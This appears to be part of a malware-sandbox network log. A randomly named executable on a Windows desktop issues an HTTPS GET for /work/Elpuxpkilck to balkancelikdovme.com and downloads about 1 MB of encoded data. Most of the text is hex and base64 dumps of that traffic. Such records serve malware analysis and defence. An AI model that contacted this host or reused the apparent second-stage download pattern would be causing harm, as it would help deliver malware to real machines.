                                                                                          2023-08-23 17:30:34 UTC944INData Raw: 48 79 2f 66 31 71 42 66 4c 79 39 67 58 7a 39 66 72 39 2f 56 76 39 58 50 66 7a 42 66 4c 79 39 2f 2f 79 39 66 70 62 2f 56 7a 33 61 67 56 5a 2f 66 4c 79 2b 50 2f 79 39 51 42 62 2f 56 7a 33 61 67 56 5a 2f 66 4c 79 2b 51 48 79 2f 66 33 79 38 76 6f 46 38 2f 58 36 2f 66 64 62 2f 56 7a 33 38 77 58 79 38 76 76 2f 38 6d 6f 46 57 66 66 79 38 76 7a 2f 38 76 58 36 57 2f 31 63 39 32 6f 46 57 66 66 79 38 76 30 49 38 76 58 36 57 2f 31 63 2f 57 6f 46 38 76 4c 2b 43 50 4c 31 2b 6c 76 39 58 50 64 71 42 66 4c 79 2f 77 58 7a 2f 66 31 62 2f 56 7a 33 38 77 58 79 38 67 41 4a 38 2f 58 36 2f 66 31 62 2f 56 7a 33 38 77 58 79 38 67 48 2f 38 6d 6f 46 38 76 49 43 2f 2f 4c 31 2b 6c 76 39 58 50 64 71 42 66 4c 79 41 2f 50 7a 61 67 58 7a 42 66 4c 79 42 45 4c 79 61 67 56 51 2f 66 4c 79 42
                                                                                          Data Ascii: Hy/f1qBfLy9gXz9fr9/Vv9XPfzBfLy9//y9fpb/Vz3agVZ/fLy+P/y9QBb/Vz3agVZ/fLy+QHy/f3y8voF8/X6/fdb/Vz38wXy8vv/8moFWffy8vz/8vX6W/1c92oFWffy8v0I8vX6W/1c/WoF8vL+CPL1+lv9XPdqBfLy/wXz/f1b/Vz38wXy8gAJ8/X6/f1b/Vz38wXy8gH/8moF8vIC//L1+lv9XPdqBfLyA/PzagXzBfLyBELyagVQ/fLyB
                                                                                          2023-08-23 17:30:34 UTC960INData Raw: 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38
                                                                                          Data Ascii: Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8
                                                                                          2023-08-23 17:30:34 UTC976INData Raw: 4c 79 39 50 4c 79 38 76 4c 79 38 76 62 79 35 66 4d 55 6b 66 4c 30 38 76 4c 79 38 76 4c 79 2f 76 54 79 38 76 4c 79 38 76 4c 7a 38 68 54 2b 39 50 4c 79 38 76 4c 79 38 67 48 30 38 76 4c 79 38 76 4c 79 39 76 4c 6c 38 78 53 52 41 66 54 79 38 76 4c 79 38 76 49 47 39 50 4c 79 38 76 4c 79 38 76 50 79 46 41 62 30 38 76 4c 79 38 76 4c 79 43 66 54 79 38 76 4c 79 38 76 4c 32 38 75 58 7a 46 4a 45 4a 39 50 4c 79 38 76 4c 79 38 6b 58 30 38 76 4c 79 38 76 4c 79 38 2f 49 55 52 66 54 79 38 76 4c 79 38 76 4a 49 39 50 4c 79 38 76 4c 79 38 76 62 79 35 66 4d 55 6b 66 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4b 43 38 2f 4c 79 38 76 4c 79 38 70 7a 7a 38 76 4c 79 38 76 4c 79 38 2f 49 62 6e 50 50 79 38 76 4c 79 38 76 4b 6d 38 2f 4c 79 38 76 4c 79 38 76 62 79 35
                                                                                          Data Ascii: Ly9PLy8vLy8vby5fMUkfL08vLy8vLy/vTy8vLy8vLz8hT+9PLy8vLy8gH08vLy8vLy9vLl8xSRAfTy8vLy8vIG9PLy8vLy8vPyFAb08vLy8vLyCfTy8vLy8vL28uXzFJEJ9PLy8vLy8kX08vLy8vLy8/IURfTy8vLy8vJI9PLy8vLy8vby5fMUkfLy8vLy8vLy8vLy8vLy8vKC8/Ly8vLy8pzz8vLy8vLy8/IbnPPy8vLy8vKm8/Ly8vLy8vby5
                                                                                          2023-08-23 17:30:34 UTC992INData Raw: 6a 30 38 76 49 72 66 50 4c 79 2f 2f 4c 79 38 76 58 7a 6e 50 4c 79 38 76 62 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 67 54 30 38 76 4a 59 42 2f 4c 79 41 50 4c 79 38 76 58 7a 42 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 6d 6e 30 38 76 4a 34 42 50 4c 79 41 66 4c 79 38 76 58 7a 50 76 4c 79 38 76 50 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 54 7a 63 6f 4f 7a 66 79 38 76 49 53 43 76 4c 79 38 2f 4c 79 38 76 58 7a 55 2f 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 54 79 63 6b 4e 79 54 79 38 76 4a 52 38 76 4c 79 39 50 4c 79 38 76 58 7a 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 38 76 4c 79 54 79 55 32 4e 76 4c 79 38 76 4a 68 2b 2f 4c 79 2b 50 4c 79 38
                                                                                          Data Ascii: j08vIrfPLy//Ly8vXznPLy8vby8vLy8vLy8vLy8vLy8vLy8gT08vJYB/LyAPLy8vXzBvLy8vLy8vLy8vLy8vLy8vLy8vLy8mn08vJ4BPLyAfLy8vXzPvLy8vPy8vLy8vLy8vLy8vLyTzcoOzfy8vISCvLy8/Ly8vXzU/Ly8vLy8vLy8vLy8vLy8vLyTyckNyTy8vJR8vLy9PLy8vXz8vLy8vLy8vLy8vLy8vLy8vLyTyU2NvLy8vJh+/Ly+PLy8
                                                                                          2023-08-23 17:30:34 UTC1008INData Raw: 38 6d 38 69 49 69 4d 43 77 78 4b 6a 6f 33 4b 7a 55 69 4e 54 67 78 49 69 34 6f 50 43 49 6e 4e 7a 49 31 4e 6b 38 7a 4a 44 55 33 54 31 48 79 49 69 49 77 4c 44 45 71 4f 6a 63 72 4e 53 49 6d 4e 76 49 75 4b 44 77 69 4a 7a 63 79 4e 53 49 76 4c 44 59 33 38 69 49 69 49 6a 70 58 56 53 49 77 4c 44 45 71 4f 6a 63 72 4e 53 49 6b 4a 79 63 69 4c 69 67 38 49 69 63 33 4d 6a 58 79 49 69 49 77 4c 44 45 71 4f 6a 63 72 4e 53 49 6d 4e 69 49 73 4d 53 77 33 38 69 49 69 49 6a 70 58 56 53 49 77 4c 44 45 71 4f 6a 63 72 4e 53 49 31 4b 44 41 79 4f 53 67 69 4c 69 67 38 49 69 63 33 4d 6a 58 79 49 69 49 77 4c 44 45 71 4f 69 49 58 62 52 59 6d 4a 43 38 76 4a 53 51 6d 4c 76 4a 6c 4c 79 39 6d 4d 54 63 31 50 42 4d 79 4c 44 45 33 38 69 49 69 49 68 55 59 62 78 64 71 62 6d 59 69 45 78 5a 6d 47
                                                                                          Data Ascii: 8m8iIiMCwxKjo3KzUiNTgxIi4oPCInNzI1Nk8zJDU3T1HyIiIwLDEqOjcrNSImNvIuKDwiJzcyNSIvLDY38iIiIjpXVSIwLDEqOjcrNSIkJyciLig8Iic3MjXyIiIwLDEqOjcrNSImNiIsMSw38iIiIjpXVSIwLDEqOjcrNSI1KDAyOSgiLig8Iic3MjXyIiIwLDEqOiIXbRYmJC8vJSQmLvJlLy9mMTc1PBMyLDE38iIiIhUYbxdqbmYiExZmG


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          1192.168.2.349736185.181.116.217443C:\Users\user\Desktop\0vJrK0NCd1.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          2023-08-23 17:31:18 UTC1012OUTGET /work/Elpuxpkilck HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: */*
                                                                                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                          Host: balkancelikdovme.com
                                                                                          2023-08-23 17:31:18 UTC1012INHTTP/1.1 200 OK
                                                                                          Connection: close
                                                                                          last-modified: Tue, 22 Aug 2023 08:42:22 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 1036168
                                                                                          date: Wed, 23 Aug 2023 17:31:18 GMT
                                                                                          vary: User-Agent
                                                                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                          2023-08-23 17:31:18 UTC1012INData Raw: 53 30 6c 4b 52 6d 46 57 48 42 64 43 59 55 52 6f 49 69 49 58 59 55 52 46 52 69 46 48 53 30 6c 4b 49 69 4a 45 59 55 56 45 56 6c 68 46 52 45 4a 68 4c 43 67 6b 4a 44 45 39 4f 43 77 7a 4e 44 6b 6d 4f 79 6f 32 4a 44 4d 36 4a 7a 45 6c 50 44 73 76 4c 54 67 36 4f 53 6b 6b 4f 44 67 32 4a 43 34 77 4a 44 49 6f 4b 7a 4d 79 4b 79 77 6c 4c 44 59 6e 4f 44 6b 30 4e 69 30 72 4a 53 51 73 4a 6a 30 33 50 54 59 78 4e 79 67 6f 4f 7a 63 32 4e 43 30 6e 50 53 77 34 4c 54 63 73 4d 30 74 4a 53 6b 5a 68 56 68 77 58 51 6d 46 45 61 43 49 69 46 32 46 45 52 55 59 68 52 30 74 4a 53 69 49 69 52 47 46 46 52 46 5a 59 52 55 52 43 59 57 59 76 4d 7a 67 37 4d 79 34 73 4c 79 59 75 53 30 6c 4b 52 6d 46 57 48 42 64 43 59 55 52 6f 49 69 49 58 59 55 52 46 52 69 46 48 53 30 6c 4b 49 69 4a 45 59 55 56
                                                                                          Data Ascii: S0lKRmFWHBdCYURoIiIXYURFRiFHS0lKIiJEYUVEVlhFREJhLCgkJDE9OCwzNDkmOyo2JDM6JzElPDsvLTg6OSkkODg2JC4wJDIoKzMyKywlLDYnODk0Ni0rJSQsJj03PTYxNygoOzc2NC0nPSw4LTcsM0tJSkZhVhwXQmFEaCIiF2FERUYhR0tJSiIiRGFFRFZYRURCYWYvMzg7My4sLyYuS0lKRmFWHBdCYURoIiIXYURFRiFHS0lKIiJEYUV
                                                                                          2023-08-23 17:31:18 UTC1013INData Raw: 78 6c 4e 58 6a 6c 77 34 2b 68 4b 39 38 39 72 64 79 50 64 68 47 78 44 4e 75 57 53 7a 59 68 73 56 31 30 52 51 4c 68 72 42 75 42 5a 65 57 31 6e 49 4d 6d 4e 6a 75 2b 79 47 51 59 56 44 2f 51 30 4e 66 71 31 46 77 52 31 7a 45 4a 42 6a 74 78 56 69 53 48 55 69 32 51 46 79 62 47 41 62 7a 33 34 57 74 53 46 4c 41 33 38 55 57 53 35 61 77 6b 35 4b 4c 2f 70 2b 62 35 47 30 7a 68 73 55 75 74 65 4b 65 6b 32 7a 2f 56 50 71 79 62 39 63 4b 78 59 65 2f 39 55 63 38 43 4a 46 4b 46 37 49 54 59 66 45 50 75 4b 31 75 31 4a 52 50 2f 74 69 58 57 42 49 4c 6c 6f 55 52 49 41 47 77 58 55 4c 76 41 53 7a 64 57 72 76 78 6c 4b 34 2f 62 72 36 74 77 4e 32 46 45 73 57 53 77 6a 50 62 73 6f 70 2b 32 58 51 61 30 73 38 41 32 4e 44 55 38 6b 72 46 6d 76 44 78 59 42 31 53 50 72 2b 51 72 77 44 7a 65 76
                                                                                          Data Ascii: xlNXjlw4+hK989rdyPdhGxDNuWSzYhsV10RQLhrBuBZeW1nIMmNju+yGQYVD/Q0Nfq1FwR1zEJBjtxViSHUi2QFybGAbz34WtSFLA38UWS5awk5KL/p+b5G0zhsUuteKek2z/VPqyb9cKxYe/9Uc8CJFKF7ITYfEPuK1u1JRP/tiXWBILloURIAGwXULvASzdWrvxlK4/br6twN2FEsWSwjPbsop+2XQa0s8A2NDU8krFmvDxYB1SPr+QrwDzev
                                                                                          2023-08-23 17:31:18 UTC1028INData Raw: 5a 6b 4b 6e 41 32 45 48 45 4d 51 50 55 39 44 55 42 5a 50 6c 6b 2b 46 54 6b 57 4a 79 51 6b 63 54 30 37 4e 6a 41 30 4d 79 6c 66 4a 45 67 70 54 44 71 79 4b 72 38 6c 74 44 72 47 50 64 38 38 32 7a 33 6b 50 64 73 31 67 6b 42 35 4b 58 30 6d 69 43 69 6b 4c 71 4d 6a 72 43 61 6b 4f 70 59 30 71 43 34 59 50 47 77 6e 39 6a 67 50 4b 51 59 6a 2b 54 74 65 4e 56 73 35 55 79 5a 71 50 6d 4d 30 50 43 4e 42 4b 53 77 6c 4f 6a 78 57 4e 45 51 39 54 79 79 34 4c 4c 59 39 78 7a 54 41 4c 39 4d 71 33 45 48 57 4d 64 55 6b 6b 43 4f 43 4a 33 30 30 66 54 69 77 4d 5a 4a 41 61 79 67 43 4f 67 6b 32 4d 7a 68 61 4a 62 4d 2b 75 69 2f 68 50 4e 73 6a 65 43 61 4c 4e 35 49 6a 6d 7a 65 68 4f 78 59 39 42 45 44 2b 50 51 42 78 7a 30 46 52 4e 6c 34 78 78 79 37 6b 4d 2b 41 38 65 7a 36 66 4c 36 59 75 44
                                                                                          Data Ascii: ZkKnA2EHEMQPU9DUBZPlk+FTkWJyQkcT07NjA0MylfJEgpTDqyKr8ltDrGPd882z3kPds1gkB5KX0miCikLqMjrCakOpY0qC4YPGwn9jgPKQYj+TteNVs5UyZqPmM0PCNBKSwlOjxWNEQ9Tyy4LLY9xzTAL9Mq3EHWMdUkkCOCJ300fTiwMZJAaygCOgk2MzhaJbM+ui/hPNsjeCaLN5IjmzehOxY9BED+PQBxz0FRNl4xxy7kM+A8ez6fL6YuD
                                                                                          2023-08-23 17:31:18 UTC1044INData Raw: 62 47 75 73 6d 38 78 72 2f 47 7a 63 37 4f 78 62 61 36 78 72 2f 42 76 64 47 33 79 38 44 50 76 37 76 4c 78 4e 47 35 74 38 4c 4a 76 62 79 38 7a 64 47 36 75 38 44 52 79 4d 50 4f 77 38 72 48 76 38 50 48 78 74 48 4a 77 4d 75 36 75 72 37 41 79 63 6a 52 7a 73 62 50 75 62 71 35 76 38 57 36 79 73 32 33 75 73 44 42 79 63 71 35 79 62 72 43 75 38 6d 2f 52 4d 72 52 77 6d 6d 30 76 54 36 6f 54 37 6f 7a 6f 6b 69 2f 7a 53 71 39 7a 4d 56 4d 74 72 6a 44 54 72 71 37 76 44 4c 4f 76 62 63 6b 79 4d 64 45 61 73 76 4e 51 78 7a 4e 79 4d 5a 50 78 72 38 69 68 2b 48 42 77 4b 54 49 30 63 37 47 30 4c 6d 37 75 63 44 46 75 38 72 4b 74 37 76 41 76 73 6e 4c 75 63 61 36 79 62 76 47 76 38 62 4b 7a 73 37 46 75 62 72 4a 76 35 75 36 7a 33 43 4d 76 39 47 2b 76 63 72 43 30 62 61 33 78 4d 6d 36 76
                                                                                          Data Ascii: bGusm8xr/Gzc7Oxba6xr/BvdG3y8DPv7vLxNG5t8LJvby8zdG6u8DRyMPOw8rHv8PHxtHJwMu6ur7AycjRzsbPubq5v8W6ys23usDBycq5ybrCu8m/RMrRwmm0vT6oT7ozoki/zSq9zMVMtrjDTrq7vDLOvbckyMdEasvNQxzNyMZPxr8ih+HBwKTI0c7G0Lm7ucDFu8rKt7vAvsnLuca6ybvGv8bKzs7FubrJv5u6z3CMv9G+vcrC0ba3xMm6v
                                                                                          2023-08-23 17:31:18 UTC1060INData Raw: 37 45 30 59 65 2f 78 4d 53 47 30 63 61 37 69 37 71 39 76 59 44 4a 78 38 71 4f 78 74 43 79 65 37 6e 41 78 6e 76 4b 79 73 44 62 77 4c 34 58 7a 62 6e 47 74 65 6d 37 78 72 6a 6d 79 73 35 67 76 62 6d 36 79 63 43 2b 76 64 43 33 7a 4d 44 4f 76 37 7a 4c 78 64 47 32 74 38 50 4a 75 72 79 39 7a 63 36 36 75 73 44 4f 79 4d 4c 4f 78 4d 72 48 76 38 54 48 78 74 48 47 77 4d 75 36 76 62 37 41 79 63 66 52 7a 73 62 51 75 62 75 35 77 4d 57 37 79 73 71 33 75 38 43 2b 79 63 75 35 78 72 72 4a 75 38 61 2f 78 73 70 6e 7a 70 79 32 76 63 61 6d 77 62 72 51 72 73 75 2f 7a 71 61 37 7a 4d 57 59 75 62 6a 44 6f 4c 32 37 76 5a 54 52 76 62 71 70 30 63 66 43 6c 38 50 4e 78 36 62 44 79 4d 61 59 79 52 66 4c 6f 37 71 2b 77 4d 6e 48 30 63 37 47 30 4c 6d 37 75 63 44 46 75 38 72 4b 75 4c 74 73 31
                                                                                          Data Ascii: 7E0Ye/xMSG0ca7i7q9vYDJx8qOxtCye7nAxnvKysDbwL4XzbnGtem7xrjmys5gvbm6ycC+vdC3zMDOv7zLxdG2t8PJury9zc66usDOyMLOxMrHv8THxtHGwMu6vb7AycfRzsbQubu5wMW7ysq3u8C+ycu5xrrJu8a/xspnzpy2vcamwbrQrsu/zqa7zMWYubjDoL27vZTRvbqp0cfCl8PNx6bDyMaYyRfLo7q+wMnH0c7G0Lm7ucDFu8rKuLts1
                                                                                          2023-08-23 17:31:18 UTC1076INData Raw: 62 4b 7a 73 37 46 75 62 72 47 76 37 36 39 30 4c 66 4d 77 4d 36 2f 76 4d 76 46 30 62 61 33 77 38 6d 36 76 4c 33 4e 7a 72 71 36 77 4d 37 49 77 73 37 45 79 73 65 2f 78 4d 66 47 30 63 62 41 79 37 71 39 76 73 44 4a 78 39 48 4f 78 74 43 35 75 37 6e 41 78 62 76 4b 79 72 65 37 77 4c 37 4a 79 37 6e 47 75 73 6d 37 78 72 2f 47 79 73 37 4f 78 62 6d 36 78 72 2b 2b 76 64 43 33 7a 4d 44 4f 76 37 7a 4c 78 64 47 32 74 38 50 4a 75 72 79 39 7a 63 36 36 75 73 44 4f 79 4d 4c 4f 78 4d 72 48 76 38 54 48 78 74 48 47 77 4d 75 36 76 62 37 41 79 63 66 52 7a 73 62 51 75 62 75 35 77 4d 57 37 79 73 71 33 75 38 43 2b 79 63 75 35 78 72 72 4a 75 38 61 2f 78 73 72 4f 7a 73 57 35 75 73 61 2f 76 72 33 51 74 38 7a 41 7a 72 2b 38 79 38 58 52 74 72 66 44 79 62 71 38 76 63 33 4f 75 72 72 41 7a
                                                                                          Data Ascii: bKzs7FubrGv7690LfMwM6/vMvF0ba3w8m6vL3Nzrq6wM7Iws7Eyse/xMfG0cbAy7q9vsDJx9HOxtC5u7nAxbvKyre7wL7Jy7nGusm7xr/Gys7Oxbm6xr++vdC3zMDOv7zLxdG2t8PJury9zc66usDOyMLOxMrHv8THxtHGwMu6vb7AycfRzsbQubu5wMW7ysq3u8C+ycu5xrrJu8a/xsrOzsW5usa/vr3Qt8zAzr+8y8XRtrfDybq8vc3OurrAz
                                                                                          2023-08-23 17:31:18 UTC1092INData Raw: 62 52 78 73 44 4c 75 72 32 2b 77 4d 6e 48 30 63 37 47 30 4c 6d 37 75 63 44 46 75 38 72 4b 74 37 76 41 76 73 6e 4c 75 63 61 36 79 62 76 47 76 38 62 4b 7a 73 37 46 75 62 72 47 76 37 36 39 30 4c 66 4d 77 4d 36 2f 76 4d 76 46 30 62 61 33 77 38 6d 36 76 4c 33 4e 7a 72 71 36 77 4d 37 49 77 73 37 45 79 73 65 2f 78 4d 66 47 30 63 62 41 79 37 71 39 76 73 44 4a 78 39 48 4f 78 74 43 35 75 37 6e 41 78 62 76 4b 79 72 65 37 77 4c 37 4a 79 37 6e 47 75 73 6d 37 78 72 2f 47 79 73 37 4f 78 62 6d 36 78 72 2b 2b 76 64 43 33 7a 4d 44 4f 76 37 7a 4c 78 64 47 32 74 38 50 4a 75 72 79 39 7a 63 36 36 75 73 44 4f 79 4d 4c 4f 78 4d 72 48 76 38 54 48 78 74 48 47 77 4d 75 36 76 62 37 41 79 63 66 52 7a 73 62 51 75 62 75 35 77 4d 57 37 79 73 71 33 75 38 43 2b 79 63 75 35 78 72 72 4a 75
                                                                                          Data Ascii: bRxsDLur2+wMnH0c7G0Lm7ucDFu8rKt7vAvsnLuca6ybvGv8bKzs7FubrGv7690LfMwM6/vMvF0ba3w8m6vL3Nzrq6wM7Iws7Eyse/xMfG0cbAy7q9vsDJx9HOxtC5u7nAxbvKyre7wL7Jy7nGusm7xr/Gys7Oxbm6xr++vdC3zMDOv7zLxdG2t8PJury9zc66usDOyMLOxMrHv8THxtHGwMu6vb7AycfRzsbQubu5wMW7ysq3u8C+ycu5xrrJu
                                                                                          2023-08-23 17:31:18 UTC1108INData Raw: 45 4b 43 41 6a 39 2b 50 34 4a 45 55 6a 41 34 4d 55 4d 2b 52 45 48 2f 77 46 4d 2f 76 50 32 41 76 51 4c 2b 47 49 47 5a 63 66 4b 78 2f 5a 6e 41 76 4c 33 2f 51 73 65 42 41 67 47 2f 2f 74 53 43 67 35 69 44 51 73 52 55 4c 79 2f 75 38 6f 50 2b 41 58 33 47 77 54 31 39 51 42 51 78 56 76 47 41 76 76 2f 4a 46 70 6f 48 52 4e 71 47 45 57 39 30 42 48 35 41 6d 6f 4b 44 76 56 56 44 42 44 34 43 50 2f 2f 2b 78 62 4e 73 62 6f 45 42 66 73 48 2b 47 6a 36 44 67 63 43 5a 51 49 41 44 67 55 47 44 76 30 57 76 67 54 4a 58 67 37 34 42 78 2f 30 42 66 62 37 2b 2f 34 4e 59 62 65 70 77 4c 35 67 39 76 4a 66 2f 66 2f 36 47 66 6f 41 44 51 33 34 43 50 59 54 78 71 61 2b 43 50 55 43 4b 76 77 49 41 76 33 35 2b 50 6d 32 74 77 49 50 2f 2f 38 50 45 46 6e 2b 39 41 55 50 2b 76 64 6e 78 67 54 48 76
                                                                                          Data Ascii: EKCAj9+P4JEUjA4MUM+REH/wFM/vP2AvQL+GIGZcfKx/ZnAvL3/QseBAgG//tSCg5iDQsRULy/u8oP+AX3GwT19QBQxVvGAvv/JFpoHRNqGEW90BH5AmoKDvVVDBD4CP//+xbNsboEBfsH+Gj6DgcCZQIADgUGDv0WvgTJXg74Bx/0Bfb7+/4NYbepwL5g9vJf/f/6GfoADQ34CPYTxqa+CPUCKvwIAv35+Pm2twIP//8PEFn+9AUP+vdnxgTHv
                                                                                          2023-08-23 17:31:18 UTC1124INData Raw: 37 41 79 63 66 52 61 74 49 42 75 52 2f 6b 47 4d 55 66 33 2b 4b 33 48 2b 33 6d 79 63 75 35 78 62 72 4a 75 38 61 2f 78 73 72 4f 7a 6d 66 6b 63 73 59 61 55 35 6e 51 74 38 7a 41 7a 72 2b 38 79 38 58 52 74 72 66 44 59 2b 2f 31 76 63 33 4f 48 72 72 41 7a 73 6a 46 30 63 50 4e 78 37 2f 45 78 38 62 52 78 72 72 4c 46 56 5a 68 77 4d 6e 48 30 63 35 69 33 41 69 37 46 65 31 70 75 32 37 66 72 37 73 65 36 79 4c 4c 75 63 62 42 79 62 76 47 76 38 62 4b 7a 73 37 46 46 65 38 50 76 78 6c 57 46 62 66 4d 77 4d 36 2f 76 4d 76 46 30 62 61 33 77 38 6b 67 38 54 66 4e 7a 72 6f 65 77 4d 37 49 77 74 48 44 7a 63 69 2f 78 4d 66 47 30 63 62 41 79 72 6f 55 55 77 58 4a 78 39 48 4f 78 6d 7a 6c 43 72 6b 65 32 42 58 4b 62 75 49 70 77 4c 37 4a 30 62 6e 47 75 73 6d 37 78 72 2f 47 79 6d 72 62 4c
                                                                                          Data Ascii: 7AycfRatIBuR/kGMUf3+K3H+3mycu5xbrJu8a/xsrOzmfkcsYaU5nQt8zAzr+8y8XRtrfDY+/1vc3OHrrAzsjF0cPNx7/Ex8bRxrrLFVZhwMnH0c5i3Ai7Fe1pu27fr7se6yLLucbBybvGv8bKzs7FFe8PvxlWFbfMwM6/vMvF0ba3w8kg8TfNzroewM7IwtHDzci/xMfG0cbAyroUUwXJx9HOxmzlCrke2BXKbuIpwL7J0bnGusm7xr/GymrbL
                                                                                          2023-08-23 17:31:18 UTC1140INData Raw: 44 4f 76 37 7a 4c 78 64 47 32 74 38 50 4a 75 72 79 39 7a 63 36 36 75 73 44 4f 4f 6a 35 72 61 47 70 6b 4c 6a 56 41 5a 6d 39 78 4b 33 41 6d 4d 53 63 6f 63 54 4d 37 50 44 51 38 4c 79 73 6b 4a 7a 6f 66 62 54 59 78 4c 79 30 67 4e 54 51 61 4e 72 72 4a 75 38 61 2f 78 73 72 4f 7a 73 57 35 75 73 61 2f 76 72 33 51 74 38 7a 41 7a 72 2b 38 79 38 58 52 74 72 66 44 79 62 71 38 76 63 33 4f 75 72 72 41 7a 73 6a 43 7a 73 54 4b 78 37 2f 45 78 38 62 52 78 73 44 4c 75 72 32 2b 77 4d 6e 48 30 63 37 47 30 4c 6d 37 75 63 44 46 75 38 72 4b 74 37 76 41 76 73 6e 4c 75 63 61 36 79 62 76 47 76 38 62 4b 7a 73 37 46 75 62 72 47 4b 69 73 74 63 53 51 7a 49 57 73 75 49 47 35 6b 4f 43 67 77 5a 54 38 68 4d 43 45 2b 63 53 34 75 4d 48 45 34 4e 6e 45 30 50 6a 6b 78 4e 44 6b 36 50 7a 6f 77 50
                                                                                          Data Ascii: DOv7zLxdG2t8PJury9zc66usDOOj5raGpkLjVAZm9xK3AmMScocTM7PDQ8LyskJzofbTYxLy0gNTQaNrrJu8a/xsrOzsW5usa/vr3Qt8zAzr+8y8XRtrfDybq8vc3OurrAzsjCzsTKx7/Ex8bRxsDLur2+wMnH0c7G0Lm7ucDFu8rKt7vAvsnLuca6ybvGv8bKzs7FubrGKistcSQzIWsuIG5kOCgwZT8hMCE+cS4uMHE4NnE0PjkxNDk6PzowP
                                                                                          2023-08-23 17:31:18 UTC1156INData Raw: 62 2b 42 52 49 42 42 66 35 64 79 67 49 41 43 76 59 43 43 78 55 48 2b 67 52 4f 78 72 2f 47 79 76 67 4b 42 67 2f 31 41 45 76 37 2f 76 72 79 58 38 44 4f 76 37 7a 2b 42 76 76 2b 39 41 4e 6a 2f 2f 38 50 45 46 6d 36 48 74 35 51 79 47 54 6d 4f 73 70 6e 34 55 4c 48 61 4f 66 51 77 47 70 67 36 62 34 67 35 30 66 52 63 4f 4f 6d 75 62 75 35 43 63 57 37 79 73 71 33 48 4c 62 71 79 57 70 52 34 72 70 6c 79 41 2b 2f 61 4c 6d 66 7a 6d 48 4b 34 63 59 68 77 69 37 51 47 62 6c 64 7a 69 43 2f 42 4d 56 77 73 70 6e 44 5a 63 64 38 76 57 6e 52 69 72 6f 68 79 4d 4c 43 62 63 52 47 78 79 44 46 52 73 5a 77 78 4e 62 4c 47 37 2f 49 77 47 6a 52 56 73 35 6f 36 49 69 37 46 39 79 59 75 32 7a 75 6b 62 73 67 32 68 54 4c 46 2f 43 64 79 52 33 77 70 73 5a 73 36 49 66 46 46 39 36 54 76 79 4c 68 64
                                                                                          Data Ascii: b+BRIBBf5dygIACvYCCxUH+gROxr/GyvgKBg/1AEv7/vryX8DOv7z+Bvv+9ANj//8PEFm6Ht5QyGTmOspn4ULHaOfQwGpg6b4g50fRcOOmubu5CcW7ysq3HLbqyWpR4rplyA+/aLmfzmHK4cYhwi7QGbldziC/BMVwspnDZcd8vWnRirohyMLCbcRGxyDFRsZwxNbLG7/IwGjRVs5o6Ii7F9yYu2zukbsg2hTLF/CdyR3wpsZs6IfFF96TvyLhd
                                                                                          2023-08-23 17:31:18 UTC1172INData Raw: 6c 55 51 2b 4c 69 76 4c 33 4e 63 79 68 78 5a 71 43 36 5a 2b 2b 44 54 7a 72 63 43 63 66 47 30 58 73 58 55 4d 76 69 4b 31 35 45 69 45 72 2b 35 4e 53 35 75 37 6d 46 50 55 67 58 6f 75 73 38 45 34 46 43 6e 4e 4e 6a 75 73 6d 37 65 79 44 32 6a 6a 46 75 54 39 70 39 51 34 44 66 6c 64 43 33 7a 49 56 43 44 2f 6b 74 57 65 4d 37 65 45 69 32 32 37 69 39 7a 63 36 48 53 52 30 6c 4d 42 32 65 71 59 31 44 54 2b 51 49 78 74 48 47 68 57 6d 74 35 41 55 51 45 53 61 4f 54 42 6e 76 35 37 75 35 77 49 41 6e 48 54 63 4a 49 31 71 4b 68 6b 39 6c 36 54 66 4a 75 38 61 43 62 64 4b 54 32 72 64 32 74 59 6c 62 6b 64 73 54 74 38 7a 41 63 79 4c 78 64 62 4b 78 5a 73 53 45 45 75 33 61 56 38 33 4f 75 6f 63 31 6a 50 63 61 32 7a 4c 62 69 46 76 44 32 67 2f 52 78 73 42 32 4a 45 6b 32 6d 35 65 55 75
